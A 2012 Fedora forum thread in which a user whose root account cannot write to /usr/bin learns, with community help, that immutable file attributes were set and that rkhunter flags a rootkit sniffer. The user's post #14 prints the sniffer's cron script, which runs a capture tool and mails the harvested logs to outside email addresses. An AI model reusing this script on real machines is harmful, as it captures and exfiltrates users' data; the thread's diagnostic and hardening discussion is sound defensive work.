Fedora Linux Support Community & Resources Center
  #1  
Old 8th June 2012, 10:50 PM
Kenneth Offline
Registered User
 
Join Date: Jun 2012
Location: Norway
Posts: 7
linuxopera
Root lost access to /usr/bin and /usr/sbin

I've got a problem the last couple of days. I discovered it when I tried to update an rpm-file. Root can't write to /usr/bin or /usr/sbin. Tried chown, but keep getting this message:

chmod: changing permissions of «/usr/bin»: operation not permitted

Any ideas to what the problem is?


Kenneth
Reply With Quote
  #2  
Old 8th June 2012, 11:54 PM
jpollard Offline
Registered User
 
Join Date: Aug 2009
Location: Waldorf, Maryland
Posts: 6,870
linuxfirefox
Re: Root lost access to /usr/bin and /usr/sbin

Not without more information.

Does the system boot normally?

Are you in single user mode ?
Reply With Quote
  #3  
Old 8th June 2012, 11:58 PM
Kenneth Offline
Registered User
 
Join Date: Jun 2012
Location: Norway
Posts: 7
linuxopera
Re: Root lost access to /usr/bin and /usr/sbin

The system boots without any problems, and everything works as normal, except when root wants to write to /usr/bin or /usr/sbin. Reading from the directories are no problem.

I tried with single user, but that made no difference. Still the same error.
Reply With Quote
  #4  
Old 9th June 2012, 12:19 AM
stevea Online
Registered User
 
Join Date: Apr 2006
Location: Ohio, USA
Posts: 8,935
linuxfirefox
Re: Root lost access to /usr/bin and /usr/sbin

Post the output of "ps -Z" and "id" and "ls -ldZ /usr/bin"
__________________
None are more hopelessly enslaved than those who falsely believe they are free.
Johann Wolfgang von Goethe
Reply With Quote
  #5  
Old 9th June 2012, 12:38 AM
Kenneth Offline
Registered User
 
Join Date: Jun 2012
Location: Norway
Posts: 7
linuxopera
Re: Root lost access to /usr/bin and /usr/sbin

[root@linux ~]# ps -Z
LABEL PID TTY TIME CMD
unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 3249 pts/2 00:00:00 su
unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 3257 pts/2 00:00:00 bash
unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 3321 pts/2 00:00:00 ps

[root@linux ~]# id
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

[root@linux ~]# ls -ldZ /usr/bin/
dr-xr-xr-x. root root system_u:object_r:bin_t:s0 /usr/bin/
Reply With Quote
  #6  
Old 9th June 2012, 12:23 PM
jpollard Offline
Registered User
 
Join Date: Aug 2009
Location: Waldorf, Maryland
Posts: 6,870
linuxfirefox
Re: Root lost access to /usr/bin and /usr/sbin

Could the root mount be read-only?

What is the output of "mount"
Reply With Quote
  #7  
Old 9th June 2012, 12:39 PM
Kenneth Offline
Registered User
 
Join Date: Jun 2012
Location: Norway
Posts: 7
linuxopera
Re: Root lost access to /usr/bin and /usr/sbin

[root@linux ~]# mount
proc on /proc type proc (rw,nosuid,nodev,noexec,relatime)
sysfs on /sys type sysfs (rw,nosuid,nodev,noexec,relatime,seclabel)
devtmpfs on /dev type devtmpfs (rw,nosuid,seclabel,size=1993624k,nr_inodes=498406 ,mode=755)
devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,seclabel,gid=5,mode=620 ,ptmxmode=000)
tmpfs on /dev/shm type tmpfs (rw,nosuid,nodev,seclabel)
tmpfs on /run type tmpfs (rw,nosuid,nodev,seclabel,mode=755)
/dev/sda1 on / type ext4 (rw,relatime,seclabel,data=ordered)
securityfs on /sys/kernel/security type securityfs (rw,nosuid,nodev,noexec,relatime)
selinuxfs on /sys/fs/selinux type selinuxfs (rw,relatime)
tmpfs on /sys/fs/cgroup type tmpfs (rw,nosuid,nodev,noexec,seclabel,mode=755)
cgroup on /sys/fs/cgroup/systemd type cgroup (rw,nosuid,nodev,noexec,relatime,release_agent=/usr/lib/systemd/systemd-cgroups-agent,name=systemd)
cgroup on /sys/fs/cgroup/cpuset type cgroup (rw,nosuid,nodev,noexec,relatime,cpuset)
cgroup on /sys/fs/cgroup/cpu,cpuacct type cgroup (rw,nosuid,nodev,noexec,relatime,cpuacct,cpu)
cgroup on /sys/fs/cgroup/memory type cgroup (rw,nosuid,nodev,noexec,relatime,memory)
cgroup on /sys/fs/cgroup/devices type cgroup (rw,nosuid,nodev,noexec,relatime,devices)
cgroup on /sys/fs/cgroup/freezer type cgroup (rw,nosuid,nodev,noexec,relatime,freezer)
cgroup on /sys/fs/cgroup/net_cls type cgroup (rw,nosuid,nodev,noexec,relatime,net_cls)
cgroup on /sys/fs/cgroup/blkio type cgroup (rw,nosuid,nodev,noexec,relatime,blkio)
cgroup on /sys/fs/cgroup/perf_event type cgroup (rw,nosuid,nodev,noexec,relatime,perf_event)
systemd-1 on /proc/sys/fs/binfmt_misc type autofs (rw,relatime,fd=26,pgrp=1,timeout=300,minproto=5,m axproto=5,direct)
debugfs on /sys/kernel/debug type debugfs (rw,relatime)
mqueue on /dev/mqueue type mqueue (rw,relatime,seclabel)
hugetlbfs on /dev/hugepages type hugetlbfs (rw,relatime,seclabel)
configfs on /sys/kernel/config type configfs (rw,relatime)
tmpfs on /tmp type tmpfs (rw,seclabel)
/dev/sdb6 on /home type ext4 (rw,relatime,seclabel,data=ordered)
/dev/sdc1 on /backup type ext2 (rw,relatime,seclabel)
gvfs-fuse-daemon on /run/user/kenneth/gvfs type fuse.gvfs-fuse-daemon (rw,nosuid,nodev,relatime,user_id=1500,group_id=15 00)
fusectl on /sys/fs/fuse/connections type fusectl (rw,relatime)
Reply With Quote
  #8  
Old 11th June 2012, 10:16 PM
rockdoctor Offline
Registered User
 
Join Date: Apr 2005
Location: Owatonna, Minnesota
Posts: 110
linuxfirefox
Re: Root lost access to /usr/bin and /usr/sbin

Could it be some type of selinux corruption? I'm not running selinux, and I get
Code:
~$ sudo ps -Z
LABEL                             PID TTY          TIME CMD
-                                2448 pts/0    00:00:00 sudo
-                                2449 pts/0    00:00:00 ps
__________________
RockDoctor
Registered Linux user #360200
Reply With Quote
  #9  
Old 12th June 2012, 11:19 PM
Kenneth Offline
Registered User
 
Join Date: Jun 2012
Location: Norway
Posts: 7
linuxopera
Re: Root lost access to /usr/bin and /usr/sbin

I have no idea. Tried with different kernels. At the moment I'm running 3.5.0-0.rc2.git0.3.fc18.x86_64
Reply With Quote
  #10  
Old 15th June 2012, 02:37 AM
nirik Offline
Community Manager
 
Join Date: Mar 2009
Location: Broomfield, CO
Posts: 436
macosmidori
Re: Root lost access to /usr/bin and /usr/sbin

lsattr /usr/bin/ gives what?
Reply With Quote
  #11  
Old 15th June 2012, 03:16 PM
Kenneth Offline
Registered User
 
Join Date: Jun 2012
Location: Norway
Posts: 7
linuxopera
Re: Root lost access to /usr/bin and /usr/sbin

[root@linux ~]# lsattr /usr/
-----a----I--e- /usr/sbin
-----a----I--e- /usr/bin
Reply With Quote
  #12  
Old 15th June 2012, 03:57 PM
nirik Offline
Community Manager
 
Join Date: Mar 2009
Location: Broomfield, CO
Posts: 436
macosmidori
Re: Root lost access to /usr/bin and /usr/sbin

Yeah, so someone has set some extended attributes on that directory.

Sometimes that's a sign that your machine has been compromised. ;(

You might install and run rkhunter.

You can fix these with 'chattr'. Do a 'man chattr' to see more info.
Reply With Quote
  #13  
Old 15th June 2012, 06:04 PM
jpollard Offline
Registered User
 
Join Date: Aug 2009
Location: Waldorf, Maryland
Posts: 6,870
linuxfirefox
Re: Root lost access to /usr/bin and /usr/sbin

I accidentally did this via restoring a backup copy of the system. For some reason tar added attributes derived from the access mode and made the restore useless until I removed them all.

As I remember, no system files/directories use ACLs.
Reply With Quote
  #14  
Old 16th June 2012, 12:14 AM
Kenneth Offline
Registered User
 
Join Date: Jun 2012
Location: Norway
Posts: 7
windows_vistafirefox
Re: Root lost access to /usr/bin and /usr/sbin

nirik solved it I've configured the system so that root could log in via ssh. Probably not a good idea.

From rkhunter:

[19:39:46] Warning: Checking for possible rootkit files and directories [ Warnin
g ]
[19:39:47] Found file '/etc/cron.daily/dnsquery'. Possible rootkit: Sni
ffer

This is a copy of one of the sniffer's files:

[root@linux ~]# cat /home/kenneth/dnsquery
#!/bin/sh
cd /usr/lib/
./popauth -r httpd.log > test
cat /usr/share/misc/blah/temp.log |uniq >> test
echo >/usr/share/misc/blah/temp.log
mail unul_catalin@yahoo.com -s "$(hostname -f)" < test
mail cata@catalinx.org -s "$(hostname -f)" < test
rm -rf test httpd.log
A=$PATH
killall -9 popauth
export PATH=/usr/lib/
popauth -w httpd.log &
export PATH=$A

---------- Post added 16th June 2012 at 01:14 AM ---------- Previous post was 15th June 2012 at 08:36 PM ----------

Reinstalled the system and everything works again Will never open up SSH for root login again.

Thanks for all help
Reply With Quote
  #15  
Old 16th June 2012, 01:02 AM
jpollard Offline
Registered User
 
Join Date: Aug 2009
Location: Waldorf, Maryland
Posts: 6,870
linuxfirefox
Re: Root lost access to /usr/bin and /usr/sbin

ssh for root had nothing to do with this.

There are good and bad ways to allow root logins. One good way is to only allow local network logins via ssh.

If ssh is required for outside and root logins, then use two instances of the service - one for outside connections (recommend the default port) that does not allow root logins. A second (using a nonstandard port) for root/local network logins only.

Root logins are almost never necessary. I've used them for local network support for the purpose of synchronizing a backup server though.

Nothing else requires it.
Reply With Quote
Reply

Tags
access, lost, or usr or bin, or usr or sbin, root

Thread Tools Search this Thread
Search this Thread:

Advanced Search
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump

Similar Threads
Thread Thread Starter Forum Replies Last Post
SELinux is preventing /sbin/ifconfig access to a leaked /var/webmin/sessiondb.pag fil vertextao Using Fedora 0 29th November 2010 03:15 AM
F14 lost admin access to NAS Beaker01 Using Fedora 2 4th November 2010 01:19 PM
SELinux is preventing /usr/sbin/vsftpd "net_raw" access salex Servers & Networking 32 30th June 2010 10:53 AM
lost access to fc4 w/ XP reinstall jgubes EOL (End Of Life) Versions 5 24th April 2006 06:49 PM
Help I locked my root account and lost access to it . Tuxic Security and Privacy 17 14th March 2006 04:20 PM


Current GMT-time: 23:53 (Friday, 31-10-2014)

TopSubscribe to XML RSS for all Threads in all ForumsFedoraForumDotOrg Archive
logo

All trademarks, and forum posts in this site are property of their respective owner(s).
FedoraForum.org is privately owned and is not directly sponsored by the Fedora Project or Red Hat, Inc.

Privacy Policy | Term of Use | Posting Guidelines | Archive | Contact Us | Founding Members

Powered by vBulletin® Copyright ©2000 - 2012, vBulletin Solutions, Inc.

FedoraForum is Powered by RedHat
San Jose - Bognor Regis Photos - Hamburg-Mitte Photos